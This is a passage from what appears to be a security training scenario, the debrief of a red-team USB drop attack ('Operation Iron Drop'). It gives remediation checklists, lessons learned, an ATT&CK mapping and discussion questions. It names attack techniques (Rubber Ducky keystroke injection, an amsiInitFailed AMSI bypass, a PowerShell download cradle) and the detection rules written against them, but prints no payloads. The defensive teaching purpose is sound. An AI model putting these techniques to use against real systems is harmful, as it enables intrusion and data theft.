  • [ ] Conduct campus-wide physical sweep to collect remaining USB drives (12 unaccounted)
  • [ ] Hunt for Event ID 6416 (USB HID connection) across all 620 endpoints in past 48 hours
  • [ ] Reset credentials for mchen, asingh, and bwilliams

Short-Term Actions (24–72 hours)

  • [ ] Forensic imaging of all three compromised workstations
  • [ ] Enterprise-wide hunt for WindowsHealthCheck scheduled task and update.ps1 artifacts
  • [ ] Review all file access logs for bwilliams account on research shares
  • [ ] Deploy USB device whitelisting — block unknown HID vendor/product IDs via Intune
  • [ ] Enforce PowerShell Constrained Language Mode on all workstations through a WDAC or AppLocker policy (CLM set only via environment variable or profile is trivially undone; enforced CLM blocks the .NET reflection the amsiInitFailed bypass relies on)
  • [ ] Implement AMSI bypass detection rules in EDR
  • [ ] Brief physical security on USB drop threat — increase parking area patrols

Long-Term Actions (1–12 weeks)

  • [ ] Implement USB device whitelisting by Vendor ID/Product ID — only approved peripherals
  • [ ] Deploy USB port lockdown for lab workstations handling sensitive research data
  • [ ] Implement keystroke injection detection — alert on >500 WPM from newly connected HID devices (needs a keyboard-hook or filter-driver agent; no native Windows event records keystroke rate)
  • [ ] Conduct USB security awareness training — include USB drop simulation results
  • [ ] Restrict pedestrian access to parking structure — install badge-controlled turnstiles
  • [ ] Implement UEBA for file access anomaly detection (first-access, volume, time-of-day)
  • [ ] Deploy DLP with research data classification — block exfiltration of classified content
  • [ ] Review and restrict executive assistant access to research file shares (least privilege)
  • [ ] Implement "found USB" reporting procedure — provide secure drop boxes in lobbies

Lessons Learned

What Went Wrong

Gap | Detail | Remediation
USB HID devices not restricted | Rubber Ducky identified as keyboard — bypassed mass storage block | Implement USB device allowlisting by Vendor/Product ID; block unknown HID devices; pair with timing-based detection, since VID/PID can be spoofed
No keystroke injection detection | 3-second payload execution via rapid keystroke injection undetected | Deploy behavioral detection for >500 WPM keystroke rate from new HID devices
AMSI bypass undetected on 1 host | Payload variant bypassed AMSI on WKST-ADM-023 — no EDR alert | Alert on AMSI-tamper patterns in Event ID 4104 script blocks; enforce Constrained Language Mode through WDAC/AppLocker
Excessive file share permissions | Executive assistant had read access to all research data — never needed | Implement least privilege; quarterly access reviews; just-in-time access for sensitive shares
No USB security awareness training | Employees inserted found USB drives — 20% insertion rate | Conduct regular USB drop simulations; include in annual security awareness
Parking structure pedestrian access unrestricted | Attacker entered parking area without badge — deployed USB drives undetected | Install pedestrian access controls; increase CCTV coverage in parking areas
DLP not configured for research data | Volume-based DLP alert at 500 MB — no content classification for research IP | Deploy content-aware DLP with research data classification and blocking
No UEBA for file access | First-time access to research shares by executive assistant went undetected for 3 hours | Deploy UEBA with file access baselining and first-access alerting

What Went Right

Control | Impact
CrowdStrike EDR detection (2/3 hosts) | Detected PowerShell download cradle and suspicious scheduled task on 2 hosts
USB mass storage blocking | Prevented traditional USB mass storage attacks — forced attacker to use HID method
Event ID 6416 logging | USB device connections were logged — enabled forensic reconstruction
DLP volume-based alert | Triggered at 500 MB — detected exfiltration, but only about three hours after the upload began and nearly five hours after the USB insertion on WKST-ADM-023
CCTV in parking area | Captured USB deployment activity (though facial recognition was inconclusive)

ATT&CK Navigator Mapping

Technique ID | Technique Name | Phase
T1200 | Hardware Additions (keystroke-injection device presented as a USB keyboard) | Initial Access
T1091 | Replication Through Removable Media (the "found USB drive" lure; T1200 is the closer fit, since nothing is copied from the media) | Initial Access
T1204 | User Execution (employee plugs the found drive into an unlocked workstation) | Execution
T1059.001 | Command and Scripting Interpreter: PowerShell | Execution
T1053.005 | Scheduled Task/Job: Scheduled Task | Persistence
T1562.001 | Impair Defenses: Disable or Modify Tools (AMSI bypass) | Defense Evasion
T1083 | File and Directory Discovery | Discovery
T1041 | Exfiltration Over C2 Channel | Exfiltration


Discussion Questions


  1. Physical-Cyber Convergence: USB drop attacks exploit the gap between physical security and cybersecurity teams. How should organizations structure their security programs to ensure physical and cyber teams share threat intelligence and coordinate detection? What reporting lines and communication channels are most effective?

  2. USB Device Control Trade-offs: Blocking all USB HID devices would prevent Rubber Ducky attacks but would also break legitimate keyboards, mice, and accessibility devices. How do you balance security against operational usability? Evaluate the feasibility of USB device whitelisting by Vendor/Product ID in an organization with 620 endpoints and diverse peripheral hardware.

  3. Security Awareness Effectiveness: Published drop studies report that roughly half of found USB drives are plugged in, and this scenario's own rate was 20% with no prior USB awareness training. Annual phishing simulations have become standard practice, but USB drop simulations are rare. Why is there a gap, and how would you design a USB drop awareness program that is both effective and ethical? What are the legal and HR considerations?

  4. Red Team Ethics: The red team's rules of engagement permitted data exfiltration to demonstrate impact. The undetected compromise on WKST-ADM-023 persisted for 6 hours and resulted in 847 MB of research IP being exfiltrated to a red team-controlled server. At what point should ethical boundaries override rules of engagement? How do you write ROE that balance realism with risk?

  5. Least Privilege and Access Reviews: The executive assistant bwilliams had read access to all research file shares despite never needing that access. This is a common pattern in organizations where permissions accumulate over time. Design a quarterly access review process that would have caught this over-provisioning. What automated tools and UEBA baselines would support this?

  6. Detection Engineering Priority: Given the detection gaps identified in this scenario (HID device anomaly, keystroke injection, AMSI bypass, file access anomaly, content-aware DLP), how would you prioritize building these detections? Consider detection coverage vs. false positive rate, engineering effort, and which detection would have stopped the attack earliest in the kill chain.

  7. Insider Threat Parallels: While this scenario involves an external red team, the attack path after initial access mirrors an insider threat — a trusted user account accessing sensitive data and exfiltrating it over an encrypted channel. How would your detection and response differ if this were a genuine insider rather than a USB-based external compromise?


Scenario Debrief

Operation Iron Drop demonstrates that the convergence of physical and cyber attack vectors remains one of the most effective, and most underestimated, paths to compromise. A keystroke-injection device costing well under $100 (Hak5's Rubber Ducky, or a few-dollar microcontroller clone), disguised as a branded USB drive and placed in a parking structure, bypassed millions of dollars in network security controls by exploiting the most reliable vulnerability in any organization: human curiosity. The 20% insertion rate (3 of 15 drives) is in line with published drop studies, and the USB HID attack bypassed Intune's mass storage restrictions because keyboard devices cannot be universally blocked without breaking legitimate peripherals. The undetected compromise on WKST-ADM-023, enabled by an AMSI bypass variant, persisted for 6 hours and resulted in 847 MB of research IP exfiltration. Defense requires layered controls: USB device allowlisting by Vendor/Product ID, keystroke injection detection, AMSI bypass monitoring, UEBA for file access anomalies, content-aware DLP, physical access controls for parking areas, and, most critically, security awareness training that includes USB drop simulations. The human element is both the greatest vulnerability and the strongest potential defense.